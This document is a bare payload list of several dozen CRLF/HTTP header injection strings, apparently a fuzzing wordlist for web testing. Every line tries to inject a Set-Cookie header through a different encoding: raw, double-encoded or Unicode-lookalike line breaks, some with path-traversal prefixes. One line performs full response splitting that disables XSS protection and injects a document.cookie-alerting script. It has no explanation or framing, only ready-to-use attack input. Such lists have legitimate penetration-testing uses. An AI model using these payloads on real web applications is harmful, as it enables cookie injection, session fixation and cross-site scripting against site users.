%0aSet-Cookie:ibro
%0aSet-Cookie:whoami=ibro
%0ASet-Cookie:%20whoami=%20ibro
%0d%0aSet-Cookie:whoami=ibro
%0dSet-Cookie:whoami=ibro
%23%0aSet-Cookie:whoami=ibro
%23%0d%0aSet-Cookie:whoami=ibro
%09Set-Cookie:whoami=ibro
%23%0dSet-Cookie:whoami=ibro
%25%30%61Set-Cookie:whoami=ibro
%250aSet-Cookie:whoami=ibro
%25250aSet-Cookie:whoami=ibro
%2e%2e%2f%0d%0aSet-Cookie:whoami=ibro
%25%30aSet-Cookie:whoami=ibro
%25%30%61Set-Cookie:whoami=ibro
%2F..%0d%0aSet-Cookie:whoami=ibro
%3f%0d%0aSet-Cookie:whoami=ibro
%0d%0a%0d%0aSet-Cookie:whoami=ibro
%3f%0dSet-Cookie:whoami=ibro
%u000aSet-Cookie:whoami=ibro
%E5%98%8A%E5%98%8DSet-Cookie:whoami=ibro
%E5%98%8A%E5%98%8DSet-Cookie:ibro
%0D%0A%20Set-Cookie:whoami=ibro
%20%0D%0ASet-Cookie:whoami=ibro
%0A%20Set-Cookie:whoami=ibro
%2F%2E%2E%0D%0ASet-Cookie:whoami=ibro
%E5%98%8D%E5%98%8ASet-Cookie:whoami=ibro
%E5%98%8D%E5%98%8ASet-Cookie%3Awhoami%3Dibro%E5%98%8D%E5%98%8A
%%0a0aSet-Cookie:whoami=ibro
crlf%0d%0Set-Cookie:whoami=ibro
%25250aSet-Cookie:%20whoami=ibro
%20%0D%0aSet-Cookie:%20whoami=ibro
%2525250aSet-Cookie:whoami=ibro
%25250d%25250aSet-Cookie:whoami=ibro
%252F%252E%252E%252F%252E%252E%252F%0d%0aSet-Cookie:whoami=ibro
%0D%0A%09Set-Cookie:whoami=ibro
%25250dSet-Cookie:whoami=ibro
%E5%98%8D%E5%98%8DSet-Cookie:whoami=ibro
%3B%0d%0aSet-Cookie:whoami=ibro
%0C%0aSet-Cookie:whoami=ibro
%0D%20%0ASet-Cookie:whoami=ibro
%00%0d%0aSet-Cookie:whoami=ibro
%5C%0a%5C%0dSet-Cookie:whoami=ibro
%0a%E5%98%8D%E5%98%8ASet-Cookie:whoami=ibro
%E5%98%8E%E5%98%8FContent-Length:%200%0D%0ASet-Cookie:whoami=ibro
%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%E5%98%8D%E5%98%8ASet-Cookie:whoami=ibro%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr
%E5%98%8E%E5%98%8F%E5%98%8A%E5%98%8DSet-Cookie:whoami=ibro
%0D%0A%E5%98%8E%E5%98%8FSet-Cookie:whoami=ibro
%25E5%2598%258E%25E5%2598%258FSet-Cookie:whoami=ibro
%E5%98%8E%E5%98%8FSet-Cookie:whoami=ibro
%E4%BD%A0%E5%A5%BDSet-Cookie:whoami=ibro
%E5%9C%B0%E5%9D%80Set-Cookie:whoami=ibro
%EF%BC%8C%E5%98%BASet-Cookie:whoami=ibro
%F0%9F%98%82Set-Cookie:whoami=ibro
%C2%85Set-Cookie:whoami=ibro
%C2%80Set-Cookie:whoami=ibro
%E3%80%82Set-Cookie:whoami=ibro
%EF%BF%BDSet-Cookie:whoami=ibro
%E2%80%A8Set-Cookie:whoami=ibro
%E2%80%A9Set-Cookie:whoami=ibro
%F0%9F%92%A9Set-Cookie:whoami=ibro